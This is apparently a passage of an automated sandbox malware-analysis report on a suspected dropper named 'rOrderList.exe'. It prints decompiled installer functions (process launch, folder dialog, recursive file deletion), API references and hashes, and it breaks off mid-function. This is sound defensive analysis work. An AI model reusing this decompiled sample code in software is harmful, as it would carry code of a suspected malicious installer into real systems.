                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      • Opcode ID: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                                                      • Instruction ID: 97f05af551d2e904d84950d91e3a9b28448307360fbef328a82585e9573e9e03
                                                                                      • Opcode Fuzzy Hash: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                                                      • Instruction Fuzzy Hash: DBA001B6604500ABDE129F61EF09D0ABB72EBA4B02B418579A28590034CA365961FB1D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 78%
                                                                                      			E00401FA4(void* __ecx) {
                                                                                      				void* _t9;
                                                                                      				intOrPtr _t13;
                                                                                      				void* _t15;
                                                                                      				void* _t17;
                                                                                      				void* _t20;
                                                                                      				void* _t22;
                                                                                      
                                                                                      				_t17 = __ecx;
                                                                                      				_t19 = E00402D3E(_t15);
                                                                                      				E004055A4(0xffffffeb, _t7);
                                                                                      				_t9 = E00405B25(_t19); // executed
                                                                                      				_t20 = _t9;
                                                                                      				if(_t20 == _t15) {
                                                                                      					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                      				} else {
                                                                                      					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                                                                      						_t13 = E004069DC(_t17, _t20);
                                                                                      						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                                                                      							if(_t13 != _t15) {
                                                                                      								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                      							}
                                                                                      						} else {
                                                                                      							E00406483( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                                                      						}
                                                                                      					}
                                                                                      					_push(_t20);
                                                                                      					CloseHandle();
                                                                                      				}
                                                                                      				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t22 - 4));
                                                                                      				return 0;
                                                                                      			}









                                                                                      0x00401fa4
                                                                                      0x00401faa
                                                                                      0x00401faf
                                                                                      0x00401fb5
                                                                                      0x00401fba
                                                                                      0x00401fbe
                                                                                      0x00402925
                                                                                      0x00401fc4
                                                                                      0x00401fc7
                                                                                      0x00401fca
                                                                                      0x00401fd2
                                                                                      0x00401fe1
                                                                                      0x00401fe3
                                                                                      0x00401fe3
                                                                                      0x00401fd4
                                                                                      0x00401fd8
                                                                                      0x00401fd8
                                                                                      0x00401fd2
                                                                                      0x00401fea
                                                                                      0x00401feb
                                                                                      0x00401feb
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                        • Part of subcall function 004055A4: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                                                                                        • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                                                                                        • Part of subcall function 004055A4: lstrcatW.KERNEL32(Completed,00403040), ref: 004055FF
                                                                                        • Part of subcall function 004055A4: SetWindowTextW.USER32(Completed,Completed), ref: 00405611
                                                                                        • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                                                                                        • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                                                                                        • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                                                                                        • Part of subcall function 00405B25: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 00405B4E
                                                                                        • Part of subcall function 00405B25: CloseHandle.KERNEL32(?), ref: 00405B5B
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                        • Part of subcall function 004069DC: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069ED
                                                                                        • Part of subcall function 004069DC: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A0F
                                                                                        • Part of subcall function 00406483: wsprintfW.USER32 ref: 00406490
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2972824698-0
                                                                                      • Opcode ID: 6ac3d7534a6230e5a30e8d2e5e1c6c18580c1740cb4f96ddb61fec938e3c4bf1
                                                                                      • Instruction ID: 66341155deae8ad644fb6ace1de356795f4bfdbac14da0be535d1b9f500edd4f
                                                                                      • Opcode Fuzzy Hash: 6ac3d7534a6230e5a30e8d2e5e1c6c18580c1740cb4f96ddb61fec938e3c4bf1
                                                                                      • Instruction Fuzzy Hash: C0F09032905112EBCB20AFE5998499E73B4DF00318B21443BE912B61D1C7BC0E428A6E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 78%
                                                                                      			E00404983(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				long _v16;
                                                                                      				long _v20;
                                                                                      				long _v24;
                                                                                      				char _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				long _v36;
                                                                                      				char _v40;
                                                                                      				unsigned int _v44;
                                                                                      				signed int _v48;
                                                                                      				WCHAR* _v56;
                                                                                      				intOrPtr _v60;
                                                                                      				intOrPtr _v64;
                                                                                      				intOrPtr _v68;
                                                                                      				WCHAR* _v72;
                                                                                      				void _v76;
                                                                                      				struct HWND__* _v80;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				intOrPtr _t82;
                                                                                      				long _t87;
                                                                                      				short* _t89;
                                                                                      				void* _t95;
                                                                                      				signed int _t96;
                                                                                      				int _t109;
                                                                                      				signed short _t114;
                                                                                      				signed int _t118;
                                                                                      				struct HWND__** _t122;
                                                                                      				intOrPtr* _t138;
                                                                                      				WCHAR* _t146;
                                                                                      				unsigned int _t150;
                                                                                      				signed int _t152;
                                                                                      				unsigned int _t156;
                                                                                      				signed int _t158;
                                                                                      				signed int* _t159;
                                                                                      				signed int* _t160;
                                                                                      				struct HWND__* _t166;
                                                                                      				struct HWND__* _t167;
                                                                                      				int _t169;
                                                                                      				unsigned int _t197;
                                                                                      
                                                                                      				_t156 = __edx;
                                                                                      				_t82 =  *0x422720; // 0x51f64c
                                                                                      				_v32 = _t82;
                                                                                      				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                                                                                      				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                      				if(_a8 == 0x40b) {
                                                                                      					E00405B86(0x3fb, _t146);
                                                                                      					E004067EB(_t146);
                                                                                      				}
                                                                                      				_t167 = _a4;
                                                                                      				if(_a8 != 0x110) {
                                                                                      					L8:
                                                                                      					if(_a8 != 0x111) {
                                                                                      						L20:
                                                                                      						if(_a8 == 0x40f) {
                                                                                      							L22:
                                                                                      							_v8 = _v8 & 0x00000000;
                                                                                      							_v12 = _v12 & 0x00000000;
                                                                                      							E00405B86(0x3fb, _t146);
                                                                                      							if(E00405F19(_t186, _t146) == 0) {
                                                                                      								_v8 = 1;
                                                                                      							}
                                                                                      							E0040653C(0x421718, _t146);
                                                                                      							_t87 = E00406931(1);
                                                                                      							_v16 = _t87;
                                                                                      							if(_t87 == 0) {
                                                                                      								L30:
                                                                                      								E0040653C(0x421718, _t146);
                                                                                      								_t89 = E00405EBC(0x421718);
                                                                                      								_t158 = 0;
                                                                                      								if(_t89 != 0) {
                                                                                      									 *_t89 = 0;
                                                                                      								}
                                                                                      								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                      									goto L35;
                                                                                      								} else {
                                                                                      									_t169 = 0x400;
                                                                                      									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                      									asm("cdq");
                                                                                      									_v48 = _t109;
                                                                                      									_v44 = _t156;
                                                                                      									_v12 = 1;
                                                                                      									goto L36;
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t159 = 0;
                                                                                      								if(0 == 0x421718) {
                                                                                      									goto L30;
                                                                                      								} else {
                                                                                      									goto L26;
                                                                                      								}
                                                                                      								while(1) {
                                                                                      									L26:
                                                                                      									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
                                                                                      									if(_t114 != 0) {
                                                                                      										break;
                                                                                      									}
                                                                                      									if(_t159 != 0) {
                                                                                      										 *_t159 =  *_t159 & _t114;
                                                                                      									}
                                                                                      									_t160 = E00405E5D(0x421718);
                                                                                      									 *_t160 =  *_t160 & 0x00000000;
                                                                                      									_t159 = _t160;
                                                                                      									 *_t159 = 0x5c;
                                                                                      									if(_t159 != 0x421718) {
                                                                                      										continue;
                                                                                      									} else {
                                                                                      										goto L30;
                                                                                      									}
                                                                                      								}
                                                                                      								_t150 = _v44;
                                                                                      								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                      								_v44 = _t150 >> 0xa;
                                                                                      								_v12 = 1;
                                                                                      								_t158 = 0;
                                                                                      								__eflags = 0;
                                                                                      								L35:
                                                                                      								_t169 = 0x400;
                                                                                      								L36:
                                                                                      								_t95 = E00404E20(5);
                                                                                      								if(_v12 != _t158) {
                                                                                      									_t197 = _v44;
                                                                                      									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                      										_v8 = 2;
                                                                                      									}
                                                                                      								}
                                                                                      								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
                                                                                      									E00404E08(0x3ff, 0xfffffffb, _t95);
                                                                                      									if(_v12 == _t158) {
                                                                                      										SetDlgItemTextW(_a4, _t169, 0x421708);
                                                                                      									} else {
                                                                                      										E00404D3F(_t169, 0xfffffffc, _v48, _v44);
                                                                                      									}
                                                                                      								}
                                                                                      								_t96 = _v8;
                                                                                      								 *0x42a324 = _t96;
                                                                                      								if(_t96 == _t158) {
                                                                                      									_v8 = E0040140B(7);
                                                                                      								}
                                                                                      								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                                      									_v8 = _t158;
                                                                                      								}
                                                                                      								E004044B4(0 | _v8 == _t158);
                                                                                      								if(_v8 == _t158 &&  *0x423738 == _t158) {
                                                                                      									E004048DC();
                                                                                      								}
                                                                                      								 *0x423738 = _t158;
                                                                                      								goto L53;
                                                                                      							}
                                                                                      						}
                                                                                      						_t186 = _a8 - 0x405;
                                                                                      						if(_a8 != 0x405) {
                                                                                      							goto L53;
                                                                                      						}
                                                                                      						goto L22;
                                                                                      					}
                                                                                      					_t118 = _a12 & 0x0000ffff;
                                                                                      					if(_t118 != 0x3fb) {
                                                                                      						L12:
                                                                                      						if(_t118 == 0x3e9) {
                                                                                      							_t152 = 7;
                                                                                      							memset( &_v76, 0, _t152 << 2);
                                                                                      							_v80 = _t167;
                                                                                      							_v72 = 0x423748;
                                                                                      							_v60 = E00404CD9;
                                                                                      							_v56 = _t146;
                                                                                      							_v68 = E00406579(_t146, 0x423748, _t167, 0x421f20, _v12);
                                                                                      							_t122 =  &_v80;
                                                                                      							_v64 = 0x41;
                                                                                      							__imp__SHBrowseForFolderW(_t122);
                                                                                      							if(_t122 == 0) {
                                                                                      								_a8 = 0x40f;
                                                                                      							} else {
                                                                                      								__imp__CoTaskMemFree(_t122);
                                                                                      								E00405E11(_t146);
                                                                                      								_t125 =  *((intOrPtr*)( *0x42a274 + 0x11c));
                                                                                      								if( *((intOrPtr*)( *0x42a274 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Interpartesforhold\\Strengelege") {
                                                                                      									E00406579(_t146, 0x423748, _t167, 0, _t125);
                                                                                      									if(lstrcmpiW(0x428200, 0x423748) != 0) {
                                                                                      										lstrcatW(_t146, 0x428200);
                                                                                      									}
                                                                                      								}
                                                                                      								 *0x423738 =  *0x423738 + 1;
                                                                                      								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                                      							}
                                                                                      						}
                                                                                      						goto L20;
                                                                                      					}
                                                                                      					if(_a12 >> 0x10 != 0x300) {
                                                                                      						goto L53;
                                                                                      					}
                                                                                      					_a8 = 0x40f;
                                                                                      					goto L12;
                                                                                      				} else {
                                                                                      					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                                      					if(E00405E88(_t146) != 0 && E00405EBC(_t146) == 0) {
                                                                                      						E00405E11(_t146);
                                                                                      					}
                                                                                      					 *0x429238 = _t167;
                                                                                      					SetWindowTextW(_t166, _t146);
                                                                                      					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                      					_push(1);
                                                                                      					E00404492(_t167);
                                                                                      					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                      					_push(0x14);
                                                                                      					E00404492(_t167);
                                                                                      					E004044C7(_t166);
                                                                                      					_t138 = E00406931(8);
                                                                                      					if(_t138 == 0) {
                                                                                      						L53:
                                                                                      						return E004044F9(_a8, _a12, _a16);
                                                                                      					} else {
                                                                                      						 *_t138(_t166, 1);
                                                                                      						goto L8;
                                                                                      					}
                                                                                      				}
                                                                                      			}













































                                                                                      0x00404983
                                                                                      0x00404989
                                                                                      0x0040498f
                                                                                      0x0040499c
                                                                                      0x004049aa
                                                                                      0x004049ad
                                                                                      0x004049b5
                                                                                      0x004049bb
                                                                                      0x004049bb
                                                                                      0x004049c7
                                                                                      0x004049ca
                                                                                      0x00404a38
                                                                                      0x00404a3f
                                                                                      0x00404b16
                                                                                      0x00404b1d
                                                                                      0x00404b2c
                                                                                      0x00404b2c
                                                                                      0x00404b30
                                                                                      0x00404b3a
                                                                                      0x00404b47
                                                                                      0x00404b49
                                                                                      0x00404b49
                                                                                      0x00404b57
                                                                                      0x00404b5e
                                                                                      0x00404b65
                                                                                      0x00404b68
                                                                                      0x00404ba4
                                                                                      0x00404ba6
                                                                                      0x00404bac
                                                                                      0x00404bb1
                                                                                      0x00404bb5
                                                                                      0x00404bb7
                                                                                      0x00404bb7
                                                                                      0x00404bd3
                                                                                      0x00000000
                                                                                      0x00404bd5
                                                                                      0x00404bd8
                                                                                      0x00404be6
                                                                                      0x00404bec
                                                                                      0x00404bed
                                                                                      0x00404bf0
                                                                                      0x00404bf3
                                                                                      0x00000000
                                                                                      0x00404bf3
                                                                                      0x00404b6a
                                                                                      0x00404b6c
                                                                                      0x00404b70
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404b72
                                                                                      0x00404b72
                                                                                      0x00404b7f
                                                                                      0x00404b84
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404b88
                                                                                      0x00404b8a
                                                                                      0x00404b8a
                                                                                      0x00404b93
                                                                                      0x00404b95
                                                                                      0x00404b9a
                                                                                      0x00404b9d
                                                                                      0x00404ba2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404ba2
                                                                                      0x00404bff
                                                                                      0x00404c09
                                                                                      0x00404c0c
                                                                                      0x00404c0f
                                                                                      0x00404c16
                                                                                      0x00404c16
                                                                                      0x00404c18
                                                                                      0x00404c18
                                                                                      0x00404c1d
                                                                                      0x00404c1f
                                                                                      0x00404c27
                                                                                      0x00404c2e
                                                                                      0x00404c30
                                                                                      0x00404c3b
                                                                                      0x00404c3b
                                                                                      0x00404c30
                                                                                      0x00404c4b
                                                                                      0x00404c55
                                                                                      0x00404c5d
                                                                                      0x00404c78
                                                                                      0x00404c5f
                                                                                      0x00404c68
                                                                                      0x00404c68
                                                                                      0x00404c5d
                                                                                      0x00404c7d
                                                                                      0x00404c82
                                                                                      0x00404c87
                                                                                      0x00404c90
                                                                                      0x00404c90
                                                                                      0x00404c99
                                                                                      0x00404c9b
                                                                                      0x00404c9b
                                                                                      0x00404ca7
                                                                                      0x00404caf
                                                                                      0x00404cb9
                                                                                      0x00404cb9
                                                                                      0x00404cbe
                                                                                      0x00000000
                                                                                      0x00404cbe
                                                                                      0x00404b68
                                                                                      0x00404b1f
                                                                                      0x00404b26
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404b26
                                                                                      0x00404a45
                                                                                      0x00404a4e
                                                                                      0x00404a68
                                                                                      0x00404a6d
                                                                                      0x00404a77
                                                                                      0x00404a7e
                                                                                      0x00404a8a
                                                                                      0x00404a8d
                                                                                      0x00404a90
                                                                                      0x00404a97
                                                                                      0x00404a9f
                                                                                      0x00404aa2
                                                                                      0x00404aa6
                                                                                      0x00404aad
                                                                                      0x00404ab5
                                                                                      0x00404b0f
                                                                                      0x00404ab7
                                                                                      0x00404ab8
                                                                                      0x00404abf
                                                                                      0x00404ac9
                                                                                      0x00404ad1
                                                                                      0x00404ade
                                                                                      0x00404af2
                                                                                      0x00404af6
                                                                                      0x00404af6
                                                                                      0x00404af2
                                                                                      0x00404afb
                                                                                      0x00404b08
                                                                                      0x00404b08
                                                                                      0x00404ab5
                                                                                      0x00000000
                                                                                      0x00404a6d
                                                                                      0x00404a5b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404a61
                                                                                      0x00000000
                                                                                      0x004049cc
                                                                                      0x004049d9
                                                                                      0x004049e2
                                                                                      0x004049ef
                                                                                      0x004049ef
                                                                                      0x004049f6
                                                                                      0x004049fc
                                                                                      0x00404a05
                                                                                      0x00404a08
                                                                                      0x00404a0b
                                                                                      0x00404a13
                                                                                      0x00404a16
                                                                                      0x00404a19
                                                                                      0x00404a1f
                                                                                      0x00404a26
                                                                                      0x00404a2d
                                                                                      0x00404cc4
                                                                                      0x00404cd6
                                                                                      0x00404a33
                                                                                      0x00404a36
                                                                                      0x00000000
                                                                                      0x00404a36
                                                                                      0x00404a2d

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 004049D2
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004049FC
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404AAD
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404AB8
                                                                                      • lstrcmpiW.KERNEL32(: Completed,00423748,00000000,?,?), ref: 00404AEA
                                                                                      • lstrcatW.KERNEL32(?,: Completed), ref: 00404AF6
                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B08
                                                                                        • Part of subcall function 00405B86: GetDlgItemTextW.USER32(?,?,00000400,00404B3F), ref: 00405B99
                                                                                        • Part of subcall function 004067EB: CharNextW.USER32(?,*?|<>/":,00000000,00000000,77253420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rOrderList.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
                                                                                        • Part of subcall function 004067EB: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
                                                                                        • Part of subcall function 004067EB: CharNextW.USER32(?,00000000,77253420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rOrderList.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
                                                                                        • Part of subcall function 004067EB: CharPrevW.USER32(?,?,77253420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rOrderList.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
                                                                                      • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404BCB
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BE6
                                                                                        • Part of subcall function 00404D3F: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
                                                                                        • Part of subcall function 00404D3F: wsprintfW.USER32 ref: 00404DE9
                                                                                        • Part of subcall function 00404D3F: SetDlgItemTextW.USER32(?,00423748), ref: 00404DFC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: : Completed$A$C:\Users\user\AppData\Local\Interpartesforhold\Strengelege$H7B
                                                                                      • API String ID: 2624150263-2816474767
                                                                                      • Opcode ID: 83ae3fbfb63e7b455576b8aada3752b90d41a1be7a9e86eb6c517827e269a7ee
                                                                                      • Instruction ID: 8299be71a3cc8d15b5ba292867d4bcc1bae11f059afa92557538f40593a335a7
                                                                                      • Opcode Fuzzy Hash: 83ae3fbfb63e7b455576b8aada3752b90d41a1be7a9e86eb6c517827e269a7ee
                                                                                      • Instruction Fuzzy Hash: 8EA193B1900209ABDB11AFA5DD45AAFB7B8EF84314F11803BF601B62D1D77C9941CB6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 98%
                                                                                      			E00405C4E(void* __eflags, signed int _a4, signed int _a8) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				short _v556;
                                                                                      				short _v558;
                                                                                      				struct _WIN32_FIND_DATAW _v604;
                                                                                      				signed int _t38;
                                                                                      				signed int _t52;
                                                                                      				signed int _t55;
                                                                                      				signed int _t62;
                                                                                      				void* _t64;
                                                                                      				signed char _t65;
                                                                                      				WCHAR* _t66;
                                                                                      				void* _t67;
                                                                                      				WCHAR* _t68;
                                                                                      				void* _t70;
                                                                                      
                                                                                      				_t65 = _a8;
                                                                                      				_t68 = _a4;
                                                                                      				_v8 = _t65 & 0x00000004;
                                                                                      				_t38 = E00405F19(__eflags, _t68);
                                                                                      				_v12 = _t38;
                                                                                      				if((_t65 & 0x00000008) != 0) {
                                                                                      					_t62 = DeleteFileW(_t68);
                                                                                      					asm("sbb eax, eax");
                                                                                      					_t64 =  ~_t62 + 1;
                                                                                      					 *0x42a308 =  *0x42a308 + _t64;
                                                                                      					return _t64;
                                                                                      				}
                                                                                      				_a4 = _t65;
                                                                                      				_t8 =  &_a4;
                                                                                      				 *_t8 = _a4 & 0x00000001;
                                                                                      				__eflags =  *_t8;
                                                                                      				if( *_t8 == 0) {
                                                                                      					L5:
                                                                                      					E0040653C(0x425750, _t68);
                                                                                      					__eflags = _a4;
                                                                                      					if(_a4 == 0) {
                                                                                      						E00405E5D(_t68);
                                                                                      					} else {
                                                                                      						lstrcatW(0x425750, L"\\*.*");
                                                                                      					}
                                                                                      					__eflags =  *_t68;
                                                                                      					if( *_t68 != 0) {
                                                                                      						L10:
                                                                                      						lstrcatW(_t68, 0x40a014);
                                                                                      						L11:
                                                                                      						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                                      						_t38 = FindFirstFileW(0x425750,  &_v604);
                                                                                      						_t70 = _t38;
                                                                                      						__eflags = _t70 - 0xffffffff;
                                                                                      						if(_t70 == 0xffffffff) {
                                                                                      							L26:
                                                                                      							__eflags = _a4;
                                                                                      							if(_a4 != 0) {
                                                                                      								_t30 = _t66 - 2;
                                                                                      								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                                      								__eflags =  *_t30;
                                                                                      							}
                                                                                      							goto L28;
                                                                                      						} else {
                                                                                      							goto L12;
                                                                                      						}
                                                                                      						do {
                                                                                      							L12:
                                                                                      							__eflags = _v604.cFileName - 0x2e;
                                                                                      							if(_v604.cFileName != 0x2e) {
                                                                                      								L16:
                                                                                      								E0040653C(_t66,  &(_v604.cFileName));
                                                                                      								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                                      								if(__eflags == 0) {
                                                                                      									_t52 = E00405C06(__eflags, _t68, _v8);
                                                                                      									__eflags = _t52;
                                                                                      									if(_t52 != 0) {
                                                                                      										E004055A4(0xfffffff2, _t68);
                                                                                      									} else {
                                                                                      										__eflags = _v8 - _t52;
                                                                                      										if(_v8 == _t52) {
                                                                                      											 *0x42a308 =  *0x42a308 + 1;
                                                                                      										} else {
                                                                                      											E004055A4(0xfffffff1, _t68);
                                                                                      											E00406302(_t67, _t68, 0);
                                                                                      										}
                                                                                      									}
                                                                                      								} else {
                                                                                      									__eflags = (_a8 & 0x00000003) - 3;
                                                                                      									if(__eflags == 0) {
                                                                                      										E00405C4E(__eflags, _t68, _a8);
                                                                                      									}
                                                                                      								}
                                                                                      								goto L24;
                                                                                      							}
                                                                                      							__eflags = _v558;
                                                                                      							if(_v558 == 0) {
                                                                                      								goto L24;
                                                                                      							}
                                                                                      							__eflags = _v558 - 0x2e;
                                                                                      							if(_v558 != 0x2e) {
                                                                                      								goto L16;
                                                                                      							}
                                                                                      							__eflags = _v556;
                                                                                      							if(_v556 == 0) {
                                                                                      								goto L24;
                                                                                      							}
                                                                                      							goto L16;
                                                                                      							L24:
                                                                                      							_t55 = FindNextFileW(_t70,  &_v604);
                                                                                      							__eflags = _t55;
